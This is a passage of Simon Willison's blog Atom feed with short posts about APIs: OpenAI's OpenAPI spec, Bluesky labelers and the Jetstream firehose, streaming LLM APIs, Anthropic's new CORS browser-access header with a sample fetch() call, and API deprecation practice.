&lt;/ul&gt;
&lt;p&gt;I'm still thinking through how to expose these new features in my &lt;a href="https://llm.datasette.io/"&gt;LLM&lt;/a&gt; tool, which is made harder by the fact that a number of plugins now rely on the default OpenAI implementation from core, which is currently built on top of Chat Completions. I've been worrying for a while about the impact of our entire industry building clones of one proprietary API that might change in the future, I guess now we get to see how that shakes out!


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/apis"&gt;apis&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/openai"&gt;openai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/chatgpt"&gt;chatgpt&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llm"&gt;llm&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/rag"&gt;rag&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llm-tool-use"&gt;llm-tool-use&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai-agents"&gt;ai-agents&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai-assisted-search"&gt;ai-assisted-search&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/computer-use"&gt;computer-use&lt;/a&gt;&lt;/p&gt;



</summary><category term="apis"/><category term="ai"/><category term="openai"/><category term="generative-ai"/><category term="chatgpt"/><category term="llms"/><category term="llm"/><category term="rag"/><category term="llm-tool-use"/><category term="ai-agents"/><category term="ai-assisted-search"/><category term="computer-use"/></entry><entry><title>openai/openai-openapi</title><link href="https://simonwillison.net/2024/Dec/22/openai-openapi/#atom-tag" rel="alternate"/><published>2024-12-22T22:59:25+00:00</published><updated>2024-12-22T22:59:25+00:00</updated><id>https://simonwillison.net/2024/Dec/22/openai-openapi/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://github.com/openai/openai-openapi"&gt;openai/openai-openapi&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
Seeing as the LLM world has semi-standardized on imitating OpenAI's API format for a whole host of different tools, it's useful to note that OpenAI themselves maintain a dedicated repository for a &lt;a href="https://www.openapis.org/"&gt;OpenAPI&lt;/a&gt; YAML representation of their current API.&lt;/p&gt;
&lt;p&gt;(I get OpenAI and OpenAPI typo-confused all the time, so &lt;code&gt;openai-openapi&lt;/code&gt; is a delightfully fiddly repository name.)&lt;/p&gt;
&lt;p&gt;The &lt;a href="https://github.com/openai/openai-openapi/blob/master/openapi.yaml"&gt;openapi.yaml&lt;/a&gt; file itself is over 26,000 lines long, defining 76 API endpoints ("paths" in OpenAPI terminology) and 284 "schemas" for JSON that can be sent to and from those endpoints. A much more interesting view onto it is the &lt;a href="https://github.com/openai/openai-openapi/commits/master/openapi.yaml"&gt;commit history&lt;/a&gt; for that file, showing details of when each different API feature was released.&lt;/p&gt;
&lt;p&gt;Browsing 26,000 lines of YAML isn't pleasant, so I &lt;a href="https://gist.github.com/simonw/54b4e533481cc7a686b0172c3a9ac21e"&gt;got Claude&lt;/a&gt; to build me a rudimentary YAML expand/hide exploration tool. Here's that tool running against the OpenAI schema, loaded directly from GitHub via a CORS-enabled &lt;code&gt;fetch()&lt;/code&gt; call: &lt;a href="https://tools.simonwillison.net/yaml-explorer#eyJ1cmwiOiJodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20vb3BlbmFpL29wZW5haS1vcGVuYXBpL3JlZnMvaGVhZHMvbWFzdGVyL29wZW5hcGkueWFtbCIsIm9wZW4iOlsiZDAiLCJkMjAiXX0="&gt;https://tools.simonwillison.net/yaml-explorer#.eyJ1c...&lt;/a&gt; - the code after that fragment is a base64-encoded JSON for the current state of the tool (mostly Claude's idea).&lt;/p&gt;
&lt;p&gt;&lt;img alt="Screenshot of the YAML explorer, showing a partially expanded set of sections from the OpenAI API specification." src="https://static.simonwillison.net/static/2024/yaml-explorer.jpg" /&gt;&lt;/p&gt;
&lt;p&gt;The tool is a little buggy - the expand-all option doesn't work quite how I want - but it's useful enough for the moment.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Update&lt;/strong&gt;: It turns out the &lt;a href="https://petstore.swagger.io/"&gt;petstore.swagger.io&lt;/a&gt; demo has an (as far as I can tell) undocumented &lt;code&gt;?url=&lt;/code&gt; parameter which can load external YAML files, so &lt;a href="https://petstore.swagger.io/?url=https://raw.githubusercontent.com/openai/openai-openapi/refs/heads/master/openapi.yaml"&gt;here's openai-openapi/openapi.yaml&lt;/a&gt; in an OpenAPI explorer interface.&lt;/p&gt;
&lt;p&gt;&lt;img alt="The Swagger API browser showing the OpenAI API" src="https://static.simonwillison.net/static/2024/swagger.jpg" /&gt;


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/apis"&gt;apis&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/tools"&gt;tools&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/yaml"&gt;yaml&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/openai"&gt;openai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai-assisted-programming"&gt;ai-assisted-programming&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/claude-3-5-sonnet"&gt;claude-3-5-sonnet&lt;/a&gt;&lt;/p&gt;



</summary><category term="apis"/><category term="tools"/><category term="yaml"/><category term="ai"/><category term="openai"/><category term="generative-ai"/><category term="llms"/><category term="ai-assisted-programming"/><category term="claude-3-5-sonnet"/></entry><entry><title>Private School Labeler on Bluesky</title><link href="https://simonwillison.net/2024/Nov/22/private-school-labeler-on-bluesky/#atom-tag" rel="alternate"/><published>2024-11-22T17:44:34+00:00</published><updated>2024-11-22T17:44:34+00:00</updated><id>https://simonwillison.net/2024/Nov/22/private-school-labeler-on-bluesky/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://bsky.app/profile/daddys.cash"&gt;Private School Labeler on Bluesky&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
I am utterly delighted by this subversive use of Bluesky's &lt;a href="https://docs.bsky.app/docs/advanced-guides/moderation"&gt;labels feature&lt;/a&gt;, which allows you to subscribe to a custom application that then adds visible labels to profiles.&lt;/p&gt;
&lt;p&gt;The feature was designed for moderation, but this labeler subverts it by displaying labels on accounts belonging to British public figures showing which expensive private school they went to and what the current fees are for that school.&lt;/p&gt;
&lt;p&gt;Here's what it looks like on an account - tapping the label brings up the information about the fees:&lt;/p&gt;
&lt;p&gt;&lt;img alt="Screenshot of a social media profile and post. Profile shows &amp;quot;James O'Brien @mrjamesob.bsky.social&amp;quot; with 166.7K followers, 531 following, 183 posts. Bio reads &amp;quot;Broadcaster &amp;amp; author.&amp;quot; Shows education at Ampleforth School and Private School. Contains a repost from Julia Hines about Rabbi Jeffrey, followed by a label showing &amp;quot;Ampleforth School £46,740/year (2024/2025). This label was applied by Private School Labeller" src="https://static.simonwillison.net/static/2024/bluesky-label.jpg" /&gt;&lt;/p&gt;
&lt;p&gt;These labels are only visible to users who have deliberately subscribed to the labeler. Unsurprisingly, some of those labeled aren't too happy about it!&lt;/p&gt;
&lt;p&gt;In response to a comment about attending on a scholarship, the label creator &lt;a href="https://bsky.app/profile/daddys.cash/post/3lbl43ifho22n"&gt;said&lt;/a&gt;:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;I'm explicit with the labeller that scholarship pupils, grant pupils, etc, are still included - because it's the later effects that are useful context - students from these schools get a leg up and a degree of privilege, which contributes eg to the overrepresentation in British media/politics&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;On the one hand, there are clearly opportunities for abuse here. But given the opt-in nature of the labelers, this doesn't feel hugely different to someone creating a separate webpage full of information about Bluesky profiles.&lt;/p&gt;
&lt;p&gt;I'm intrigued by the possibilities of labelers. There's a list of others on &lt;a href="https://www.bluesky-labelers.io/"&gt;bluesky-labelers.io&lt;/a&gt;, including another brilliant hack: &lt;a href="https://bsky.app/profile/did:plc:w6yx4bltuzdmiolooi4kd6zt"&gt;Bookmarks&lt;/a&gt;, which lets you "report" a post to the labeler and then displays those reported posts in a custom feed - providing a private bookmarks feature that Bluesky itself currently lacks.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Update:&lt;/strong&gt; &lt;a href="https://bsky.app/profile/us-gov-funding.bsky.social"&gt;@us-gov-funding.bsky.social&lt;/a&gt; is the inevitable labeler for US politicians showing which companies and industries are their top donors, built &lt;a href="https://bsky.app/profile/hipstersmoothie.com/post/3lbl2lgnq7c2f"&gt;by Andrew Lisowski&lt;/a&gt; (&lt;a href="https://github.com/hipstersmoothie/us-gov-contributions-labeler"&gt;source code here&lt;/a&gt;) using data sourced from &lt;a href="https://www.opensecrets.org/"&gt;OpenScrets&lt;/a&gt;. Here's what it looks like on &lt;a href="https://bsky.app/profile/senatorschumer.bsky.social/post/3lbkvtdc5ik2z"&gt;this post&lt;/a&gt;:&lt;/p&gt;
&lt;p&gt;&lt;img alt="Post by Chuck Schumer. Labels show affiliated organizations: Citigroup Inc, Goldman Sachs, Lawyers/Law Firms, Paul, Weiss et al, Real Estate, Securities &amp;amp; Investment. Post text reads &amp;quot;Democracy is in serious trouble, but it's not dead. We all have power, and we can use it together to defend our freedoms.&amp;quot;" src="https://static.simonwillison.net/static/2024/chuck-label.jpg" /&gt;


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/apis"&gt;apis&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/moderation"&gt;moderation&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/political-hacking"&gt;political-hacking&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/politics"&gt;politics&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/bluesky"&gt;bluesky&lt;/a&gt;&lt;/p&gt;



</summary><category term="apis"/><category term="moderation"/><category term="political-hacking"/><category term="politics"/><category term="bluesky"/></entry><entry><title>Bluesky WebSocket Firehose</title><link href="https://simonwillison.net/2024/Nov/20/bluesky-websocket-firehose/#atom-tag" rel="alternate"/><published>2024-11-20T04:05:02+00:00</published><updated>2024-11-20T04:05:02+00:00</updated><id>https://simonwillison.net/2024/Nov/20/bluesky-websocket-firehose/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://tools.simonwillison.net/bluesky-firehose"&gt;Bluesky WebSocket Firehose&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
Very quick (10 seconds &lt;a href="https://gist.github.com/simonw/15ee25c9cc52b40e0733f2f889c1e873"&gt;of Claude hacking&lt;/a&gt;) prototype of a web page that attaches to the public Bluesky WebSocket firehose and displays the results directly in your browser.&lt;/p&gt;
&lt;p&gt;Here's &lt;a href="https://github.com/simonw/tools/blob/main/bluesky-firehose.html"&gt;the code&lt;/a&gt; - there's very little to it, it's basically opening a connection to &lt;code&gt;wss://jetstream2.us-east.bsky.network/subscribe?wantedCollections=app.bsky.feed.post&lt;/code&gt; and logging out the results to a &lt;code&gt;&amp;lt;textarea readonly&amp;gt;&lt;/code&gt; element.&lt;/p&gt;
&lt;p&gt;&lt;img src="https://static.simonwillison.net/static/2024/bluesky.gif" class="blogmark-image"&gt;&lt;/p&gt;
&lt;p&gt;Bluesky's &lt;a href="https://docs.bsky.app/blog/jetstream"&gt;Jetstream&lt;/a&gt; isn't their main atproto firehose - that's a more complicated protocol involving CBOR data and CAR files. Jetstream is a new Go proxy (&lt;a href="https://github.com/bluesky-social/jetstream"&gt;source code here&lt;/a&gt;) that provides a subset of that firehose over WebSocket.&lt;/p&gt;
&lt;p&gt;Jetstream was built by Bluesky developer Jaz, initially as a side-project, in response to the surge of traffic they received back in September when Brazil banned Twitter. See &lt;a href="https://jazco.dev/2024/09/24/jetstream/"&gt;Jetstream: Shrinking the AT Proto Firehose by &amp;gt;99%&lt;/a&gt; for their description of the project when it first launched.&lt;/p&gt;
&lt;p&gt;The API scene growing around Bluesky is &lt;em&gt;really exciting&lt;/em&gt; right now. Twitter's API is so expensive it may as well not exist, and Mastodon's community have pushed back against many potential uses of the Mastodon API as incompatible with that community's value system.&lt;/p&gt;
&lt;p&gt;Hacking on Bluesky feels reminiscent of the massive diversity of innovation we saw around Twitter back in the late 2000s and early 2010s.&lt;/p&gt;
&lt;p&gt;Here's a much more fun Bluesky demo by Theo Sanderson: &lt;a href="https://firehose3d.theo.io/"&gt;firehose3d.theo.io&lt;/a&gt; (&lt;a href="https://github.com/theosanderson/firehose"&gt;source code here&lt;/a&gt;) which displays the firehose from that same WebSocket endpoint in the style of a Windows XP screensaver.


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/apis"&gt;apis&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/twitter"&gt;twitter&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/websockets"&gt;websockets&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/mastodon"&gt;mastodon&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/bluesky"&gt;bluesky&lt;/a&gt;&lt;/p&gt;



</summary><category term="apis"/><category term="twitter"/><category term="websockets"/><category term="mastodon"/><category term="bluesky"/></entry><entry><title>How streaming LLM APIs work</title><link href="https://simonwillison.net/2024/Sep/22/how-streaming-llm-apis-work/#atom-tag" rel="alternate"/><published>2024-09-22T03:48:12+00:00</published><updated>2024-09-22T03:48:12+00:00</updated><id>https://simonwillison.net/2024/Sep/22/how-streaming-llm-apis-work/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://til.simonwillison.net/llms/streaming-llm-apis"&gt;How streaming LLM APIs work&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
New TIL. I used &lt;code&gt;curl&lt;/code&gt; to explore the streaming APIs provided by OpenAI, Anthropic and Google Gemini and wrote up detailed notes on what I learned.&lt;/p&gt;
&lt;p&gt;Also includes example code for &lt;a href="https://til.simonwillison.net/llms/streaming-llm-apis#user-content-bonus-accessing-these-streams-using-httpx"&gt;receiving streaming events in Python with HTTPX&lt;/a&gt; and &lt;a href="https://til.simonwillison.net/llms/streaming-llm-apis#user-content-bonus--2-processing-streaming-events-in-javascript-with-fetch"&gt;receiving streaming events in client-side JavaScript using fetch()&lt;/a&gt;.


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/apis"&gt;apis&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/http"&gt;http&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/json"&gt;json&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;&lt;/p&gt;



</summary><category term="apis"/><category term="http"/><category term="json"/><category term="llms"/></entry><entry><title>Claude's API now supports CORS requests, enabling client-side applications</title><link href="https://simonwillison.net/2024/Aug/23/anthropic-dangerous-direct-browser-access/#atom-tag" rel="alternate"/><published>2024-08-23T02:29:08+00:00</published><updated>2024-08-23T02:29:08+00:00</updated><id>https://simonwillison.net/2024/Aug/23/anthropic-dangerous-direct-browser-access/#atom-tag</id><summary type="html">
    &lt;p&gt;Anthropic have enabled CORS support for their JSON APIs, which means it's now possible to call the Claude LLMs directly from a user's browser.&lt;/p&gt;

&lt;p&gt;This massively significant new feature is tucked away in this pull request: &lt;a href="https://github.com/anthropics/anthropic-sdk-typescript/pull/504"&gt;anthropic-sdk-typescript: add support for browser usage&lt;/a&gt;, via &lt;a href="https://github.com/anthropics/anthropic-sdk-typescript/issues/248#issuecomment-2302791227" title="Add a dangerouslyAllowBrowser option to allow running in the browser"&gt;this issue&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;This change to the &lt;a href="https://github.com/anthropics/anthropic-sdk-typescript"&gt;Anthropic TypeScript SDK&lt;/a&gt; reveals the new JSON API feature, which I found &lt;a href="https://github.com/anthropics/anthropic-sdk-typescript/blob/e400d2e8a54aa736717ed849ef8b44a3490fce68/src/index.ts#L151"&gt;by digging through the code&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;You can now add the following HTTP request header to enable CORS support for the Anthropic API, which means you can make calls to Anthropic's models directly from a browser:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;anthropic-dangerous-direct-browser-access: true
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Anthropic had been resistant to adding this feature because it can encourage a nasty anti-pattern: if you embed your API key in your client code, anyone with access to that site can steal your API key and use it to make requests on your behalf. &lt;/p&gt;
&lt;p&gt;Despite that, there are legitimate use cases for this feature. It's fine for internal tools exposed to trusted users, or you can implement a "bring your own API key" pattern where users supply their own key to use with your client-side app.&lt;/p&gt;
&lt;p&gt;As it happens, I've built one of those apps myself! My &lt;a href="https://tools.simonwillison.net/haiku"&gt;Haiku&lt;/a&gt; page is a simple client-side app that requests access to your webcam, asks for &lt;a href="https://console.anthropic.com/settings/keys"&gt;an Anthropic API key&lt;/a&gt; (which it stores in the browser’s &lt;code&gt;localStorage&lt;/code&gt;), and then lets you take a photo and turns it into a Haiku using their fast and inexpensive &lt;a href="https://www.anthropic.com/news/claude-3-haiku"&gt;Haiku model&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;&lt;img src="https://static.simonwillison.net/static/2024/cleo-haiku-card.jpg" alt="Screenshot of the app - Cleo the dog sits patiently on the floor, a haiku reads Loyal canine friend,
Gentle eyes, awaiting praise
Cherished companion - buttons are visible for taking the photo and switching the camera" /&gt;&lt;/p&gt;
&lt;p&gt;Previously I had to run my own &lt;a href="https://github.com/simonw/tools/blob/main/vercel/anthropic-proxy/index.js"&gt;proxy on Vercel&lt;/a&gt; adding CORS support to the Anthropic API just to get my Haiku app to work.&lt;/p&gt;
&lt;p&gt;This evening I &lt;a href="https://github.com/simonw/tools/commit/0249ab83775861f549abb1aa80af0ca3614dc5ff"&gt;upgraded the app&lt;/a&gt; to send that new header, and now it can talk to Anthropic directly without needing my proxy.&lt;/p&gt;
&lt;p&gt;I actually got Claude &lt;a href="https://gist.github.com/simonw/6ff7bc0d47575a53463abc3482608f74"&gt;to modify the code for me&lt;/a&gt; (Claude built the Haiku app in the first place). Amusingly Claude first argued against it:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;I must strongly advise against making direct API calls from a browser, as it exposes your API key and violates best practices for API security.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;I told it "No, I have a new recommendation from Anthropic that says it's OK to do this for my private internal tools" and it made the modifications for me!&lt;/p&gt;
&lt;p&gt;The full source code &lt;a href="https://github.com/simonw/tools/blob/0249ab83775861f549abb1aa80af0ca3614dc5ff/haiku.html"&gt;can be seen here&lt;/a&gt;. Here's a simplified JavaScript snippet illustrating how to call their API from the browser using the new header:&lt;/p&gt;
&lt;div class="highlight highlight-source-js"&gt;&lt;pre&gt;&lt;span class="pl-en"&gt;fetch&lt;/span&gt;&lt;span class="pl-kos"&gt;(&lt;/span&gt;&lt;span class="pl-s"&gt;"https://api.anthropic.com/v1/messages"&lt;/span&gt;&lt;span class="pl-kos"&gt;,&lt;/span&gt; &lt;span class="pl-kos"&gt;{&lt;/span&gt;
  &lt;span class="pl-c1"&gt;method&lt;/span&gt;: &lt;span class="pl-s"&gt;"POST"&lt;/span&gt;&lt;span class="pl-kos"&gt;,&lt;/span&gt;
  &lt;span class="pl-c1"&gt;headers&lt;/span&gt;: &lt;span class="pl-kos"&gt;{&lt;/span&gt;
    &lt;span class="pl-s"&gt;"x-api-key"&lt;/span&gt;: &lt;span class="pl-s1"&gt;apiKey&lt;/span&gt;&lt;span class="pl-kos"&gt;,&lt;/span&gt;
    &lt;span class="pl-s"&gt;"anthropic-version"&lt;/span&gt;: &lt;span class="pl-s"&gt;"2023-06-01"&lt;/span&gt;&lt;span class="pl-kos"&gt;,&lt;/span&gt;
    &lt;span class="pl-s"&gt;"content-type"&lt;/span&gt;: &lt;span class="pl-s"&gt;"application/json"&lt;/span&gt;&lt;span class="pl-kos"&gt;,&lt;/span&gt;
    &lt;span class="pl-s"&gt;"anthropic-dangerous-direct-browser-access"&lt;/span&gt;: &lt;span class="pl-s"&gt;"true"&lt;/span&gt;&lt;span class="pl-kos"&gt;,&lt;/span&gt;
  &lt;span class="pl-kos"&gt;}&lt;/span&gt;&lt;span class="pl-kos"&gt;,&lt;/span&gt;
  &lt;span class="pl-c1"&gt;body&lt;/span&gt;: &lt;span class="pl-c1"&gt;JSON&lt;/span&gt;&lt;span class="pl-kos"&gt;.&lt;/span&gt;&lt;span class="pl-en"&gt;stringify&lt;/span&gt;&lt;span class="pl-kos"&gt;(&lt;/span&gt;&lt;span class="pl-kos"&gt;{&lt;/span&gt;
    &lt;span class="pl-c1"&gt;model&lt;/span&gt;: &lt;span class="pl-s"&gt;"claude-3-haiku-20240307"&lt;/span&gt;&lt;span class="pl-kos"&gt;,&lt;/span&gt;
    &lt;span class="pl-c1"&gt;max_tokens&lt;/span&gt;: &lt;span class="pl-c1"&gt;1024&lt;/span&gt;&lt;span class="pl-kos"&gt;,&lt;/span&gt;
    &lt;span class="pl-c1"&gt;messages&lt;/span&gt;: &lt;span class="pl-kos"&gt;[&lt;/span&gt;
      &lt;span class="pl-kos"&gt;{&lt;/span&gt;
        &lt;span class="pl-c1"&gt;role&lt;/span&gt;: &lt;span class="pl-s"&gt;"user"&lt;/span&gt;&lt;span class="pl-kos"&gt;,&lt;/span&gt;
        &lt;span class="pl-c1"&gt;content&lt;/span&gt;: &lt;span class="pl-kos"&gt;[&lt;/span&gt;
          &lt;span class="pl-kos"&gt;{&lt;/span&gt; &lt;span class="pl-c1"&gt;type&lt;/span&gt;: &lt;span class="pl-s"&gt;"text"&lt;/span&gt;&lt;span class="pl-kos"&gt;,&lt;/span&gt; &lt;span class="pl-c1"&gt;text&lt;/span&gt;: &lt;span class="pl-s"&gt;"Return a haiku about how great pelicans are"&lt;/span&gt; &lt;span class="pl-kos"&gt;}&lt;/span&gt;&lt;span class="pl-kos"&gt;,&lt;/span&gt;
        &lt;span class="pl-kos"&gt;]&lt;/span&gt;&lt;span class="pl-kos"&gt;,&lt;/span&gt;
      &lt;span class="pl-kos"&gt;}&lt;/span&gt;&lt;span class="pl-kos"&gt;,&lt;/span&gt;
    &lt;span class="pl-kos"&gt;]&lt;/span&gt;&lt;span class="pl-kos"&gt;,&lt;/span&gt;
  &lt;span class="pl-kos"&gt;}&lt;/span&gt;&lt;span class="pl-kos"&gt;)&lt;/span&gt;&lt;span class="pl-kos"&gt;,&lt;/span&gt;
&lt;span class="pl-kos"&gt;}&lt;/span&gt;&lt;span class="pl-kos"&gt;)&lt;/span&gt;
  &lt;span class="pl-kos"&gt;.&lt;/span&gt;&lt;span class="pl-en"&gt;then&lt;/span&gt;&lt;span class="pl-kos"&gt;(&lt;/span&gt;&lt;span class="pl-kos"&gt;(&lt;/span&gt;&lt;span class="pl-s1"&gt;response&lt;/span&gt;&lt;span class="pl-kos"&gt;)&lt;/span&gt; &lt;span class="pl-c1"&gt;=&amp;gt;&lt;/span&gt; &lt;span class="pl-s1"&gt;response&lt;/span&gt;&lt;span class="pl-kos"&gt;.&lt;/span&gt;&lt;span class="pl-en"&gt;json&lt;/span&gt;&lt;span class="pl-kos"&gt;(&lt;/span&gt;&lt;span class="pl-kos"&gt;)&lt;/span&gt;&lt;span class="pl-kos"&gt;)&lt;/span&gt;
  &lt;span class="pl-kos"&gt;.&lt;/span&gt;&lt;span class="pl-en"&gt;then&lt;/span&gt;&lt;span class="pl-kos"&gt;(&lt;/span&gt;&lt;span class="pl-kos"&gt;(&lt;/span&gt;&lt;span class="pl-s1"&gt;data&lt;/span&gt;&lt;span class="pl-kos"&gt;)&lt;/span&gt; &lt;span class="pl-c1"&gt;=&amp;gt;&lt;/span&gt; &lt;span class="pl-kos"&gt;{&lt;/span&gt;
    &lt;span class="pl-k"&gt;const&lt;/span&gt; &lt;span class="pl-s1"&gt;haiku&lt;/span&gt; &lt;span class="pl-c1"&gt;=&lt;/span&gt; &lt;span class="pl-s1"&gt;data&lt;/span&gt;&lt;span class="pl-kos"&gt;.&lt;/span&gt;&lt;span class="pl-c1"&gt;content&lt;/span&gt;&lt;span class="pl-kos"&gt;[&lt;/span&gt;&lt;span class="pl-c1"&gt;0&lt;/span&gt;&lt;span class="pl-kos"&gt;]&lt;/span&gt;&lt;span class="pl-kos"&gt;.&lt;/span&gt;&lt;span class="pl-c1"&gt;text&lt;/span&gt;&lt;span class="pl-kos"&gt;;&lt;/span&gt;
    &lt;span class="pl-en"&gt;alert&lt;/span&gt;&lt;span class="pl-kos"&gt;(&lt;/span&gt;&lt;span class="pl-s1"&gt;haiku&lt;/span&gt;&lt;span class="pl-kos"&gt;)&lt;/span&gt;&lt;span class="pl-kos"&gt;;&lt;/span&gt;
  &lt;span class="pl-kos"&gt;}&lt;/span&gt;&lt;span class="pl-kos"&gt;)&lt;/span&gt;&lt;span class="pl-kos"&gt;;&lt;/span&gt;&lt;/pre&gt;&lt;/div&gt;
    
        &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/apis"&gt;apis&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/javascript"&gt;javascript&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/projects"&gt;projects&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/security"&gt;security&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai-assisted-programming"&gt;ai-assisted-programming&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/anthropic"&gt;anthropic&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/claude"&gt;claude&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/cors"&gt;cors&lt;/a&gt;&lt;/p&gt;
    

</summary><category term="apis"/><category term="javascript"/><category term="projects"/><category term="security"/><category term="ai"/><category term="generative-ai"/><category term="llms"/><category term="ai-assisted-programming"/><category term="anthropic"/><category term="claude"/><category term="cors"/></entry><entry><title>Quoting European Commission</title><link href="https://simonwillison.net/2024/Jul/13/european-commission/#atom-tag" rel="alternate"/><published>2024-07-13T03:52:48+00:00</published><updated>2024-07-13T03:52:48+00:00</updated><id>https://simonwillison.net/2024/Jul/13/european-commission/#atom-tag</id><summary type="html">
    &lt;blockquote cite="https://ec.europa.eu/commission/presscorner/detail/en/IP_24_3761"&gt;&lt;p&gt;Third, X fails to &lt;strong&gt;provide access to its public data to researchers&lt;/strong&gt; in line with the conditions set out in the DSA. In particular, X prohibits eligible researchers from &lt;strong&gt;independently accessing&lt;/strong&gt; its public data, such as by scraping, as stated in its terms of service. In addition, X's process to &lt;strong&gt;grant eligible researchers access to its application programming interface (API)&lt;/strong&gt; appears to dissuade researchers from carrying out their research projects or leave them with no other choice than to pay disproportionally high fees.&lt;/p&gt;&lt;/blockquote&gt;
&lt;p class="cite"&gt;&amp;mdash; &lt;a href="https://ec.europa.eu/commission/presscorner/detail/en/IP_24_3761"&gt;European Commission&lt;/a&gt;&lt;/p&gt;

    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/apis"&gt;apis&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/twitter"&gt;twitter&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/europe"&gt;europe&lt;/a&gt;&lt;/p&gt;



</summary><category term="apis"/><category term="twitter"/><category term="europe"/></entry><entry><title>Deactivating an API, one step at a time</title><link href="https://simonwillison.net/2024/Jul/9/deactivating-an-api/#atom-tag" rel="alternate"/><published>2024-07-09T17:23:07+00:00</published><updated>2024-07-09T17:23:07+00:00</updated><id>https://simonwillison.net/2024/Jul/9/deactivating-an-api/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://apichangelog.substack.com/p/deactivating-an-api-one-step-at-a"&gt;Deactivating an API, one step at a time&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
Bruno Pedro describes a sensible approach for web API deprecation, using API keys to first block new users from using the old API, then track which existing users are depending on the old version and reaching out to them with a sunset period.&lt;/p&gt;
&lt;p&gt;The only suggestion I'd add is to implement API brownouts - short periods of time where the deprecated API returns errors, several months before the final deprecation. This can help give users who don't read emails from you notice that they need to pay attention before their integration breaks entirely.&lt;/p&gt;
&lt;p&gt;I've seen GitHub use this brownout technique successfully several times over the last few years - here's &lt;a href="https://github.blog/changelog/2021-08-10-brownout-notice-api-authentication-via-query-parameters-for-48-hours/"&gt;one example&lt;/a&gt;.

    &lt;p&gt;&lt;small&gt;&lt;/small&gt;Via &lt;a href="https://news.ycombinator.com/item?id=40881077"&gt;Hacker News&lt;/a&gt;&lt;/small&gt;&lt;/p&gt;


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/apis"&gt;apis&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/github"&gt;github&lt;/a&gt;&lt;/p&gt;



</summary><category term="apis"/><category term="github"/></entry><entry><title>Jina AI Reader</title><link href="https://simonwillison.net/2024/Jun/16/jina-ai-reader/#atom-tag" rel="alternate"/><published>2024-06-16T19:33:58+00:00</published><updated>2024-06-16T19:33:58+00:00</updated><id>https://simonwillison.net/2024/Jun/16/jina-ai-reader/#atom-tag</id><summary type="html">
    
